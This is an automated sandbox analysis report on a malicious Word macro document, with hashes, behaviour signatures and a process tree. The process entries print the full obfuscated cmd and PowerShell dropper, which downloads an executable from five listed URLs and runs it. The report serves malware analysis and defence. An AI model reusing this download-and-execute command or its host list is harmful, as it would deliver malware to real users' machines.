Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    15/06/2024, 05:32

General

  • Target

    ad03848914f32c13d42c4ec04ad0055f_JaffaCakes118.doc

  • Size

    210KB

  • MD5

    ad03848914f32c13d42c4ec04ad0055f

  • SHA1

    27ea1fd75618638deef4f376ae5f02eb5d15252d

  • SHA256

    d16af644e142dc68661bf08ed7323e85be44834275442de9cc50dd9428251ee0

  • SHA512

    e86dd09b80c92854a93d75ee55976764ccd91176c27f589135c2121b847af8b2b753371edf7b0ebfa2a29088cb32b8eda4d3c30da7895bdbf1f60056c9f51081

  • SSDEEP

    3072:jDX920f/bSvGff0dvqr+/iNKDzaJFUKc0UTE7yZRUV7RJeOzi8E:d2KS+RSaEDzYUTE7yZRVUi8E

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://easyaccesshs.com/WYPsCYUe_89F0oV

exe.dropper

http://dowseservices.com/Cna7kt_HtIAD2LqT_rXDH9b

exe.dropper

http://www.immo-en-israel.com/mP7mhva_1xVx_6tOstw7

exe.dropper

http://www.giancarlopuppo.com/tmp/3JBXN3_NmitWLk37_trb2wuQ

exe.dropper

http://kcpaving.co.za/vTzd_4jLXhB6AV

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ad03848914f32c13d42c4ec04ad0055f_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2180
    • \??\c:\windows\SysWOW64\cmd.exe
      c:\FantasticPlasticBallhn28\Intelligentv66\Takaj42\..\..\..\windows\system32\cmd.exe /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $MalaysianRinggitv64='Drivesp88';$Avonuw65=new-object Net.WebClient;$ArmenianDramp86='http://easyaccesshs.com/WYPsCYUe_89F0oV@http://dowseservices.com/Cna7kt_HtIAD2LqT_rXDH9b@http://www.immo-en-israel.com/mP7mhva_1xVx_6tOstw7@http://www.giancarlopuppo.com/tmp/3JBXN3_NmitWLk37_trb2wuQ@http://kcpaving.co.za/vTzd_4jLXhB6AV'.Split('@');$Woodenzv78='abilityak36';$Nevadaoq74 = '977';$Bedfordshiref76='Concretek63';$yellowz96=$env:public+'\'+$Nevadaoq74+'.exe';foreach($Omanp5 in $ArmenianDramp86){try{$Avonuw65.DownloadFile($Omanp5, $yellowz96);$Buckinghamshireqh53='arrayli8';If ((Get-Item $yellowz96).length -ge 80000) {Invoke-Item $yellowz96;$Skyways98='AutomotiveSportsmp23';break;}}catch{}}$WestVirginiaz96='IncredibleFreshShoesp44';
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2040
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell $MalaysianRinggitv64='Drivesp88';$Avonuw65=new-object Net.WebClient;$ArmenianDramp86='http://easyaccesshs.com/WYPsCYUe_89F0oV@http://dowseservices.com/Cna7kt_HtIAD2LqT_rXDH9b@http://www.immo-en-israel.com/mP7mhva_1xVx_6tOstw7@http://www.giancarlopuppo.com/tmp/3JBXN3_NmitWLk37_trb2wuQ@http://kcpaving.co.za/vTzd_4jLXhB6AV'.Split('@');$Woodenzv78='abilityak36';$Nevadaoq74 = '977';$Bedfordshiref76='Concretek63';$yellowz96=$env:public+'\'+$Nevadaoq74+'.exe';foreach($Omanp5 in $ArmenianDramp86){try{$Avonuw65.DownloadFile($Omanp5, $yellowz96);$Buckinghamshireqh53='arrayli8';If ((Get-Item $yellowz96).length -ge 80000) {Invoke-Item $yellowz96;$Skyways98='AutomotiveSportsmp23';break;}}catch{}}$WestVirginiaz96='IncredibleFreshShoesp44';
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2708
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2992

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      56b612d5f5bc22ce67f889d6672694c4

      SHA1

      09eebdba7fc874d76f7cbadba2d542f2de6e6978

      SHA256

      f67f6e9af2f83e248ed6ceb0af2f9c273136c0037e0325daa0a9b96652826a1e

      SHA512

      74064f01f77e03555aa6dd1fca911f0c1253d93dccea8dcd2c09a0eda640bed929dc53989fbca5e6c13bfaa742e2dc93d7789ade7b75a1bd8a25a3b8a8f2b66f

    • memory/2180-12-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2180-23-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2180-8-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2180-15-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2180-9-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2180-10-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2180-11-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2180-0-0x000000002F871000-0x000000002F872000-memory.dmp

      Filesize

      4KB

    • memory/2180-2-0x00000000712AD000-0x00000000712B8000-memory.dmp

      Filesize

      44KB

    • memory/2180-27-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2180-28-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2180-22-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2180-21-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2180-40-0x00000000712AD000-0x00000000712B8000-memory.dmp

      Filesize

      44KB

    • memory/2180-41-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2180-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2180-63-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2180-64-0x00000000712AD000-0x00000000712B8000-memory.dmp

      Filesize

      44KB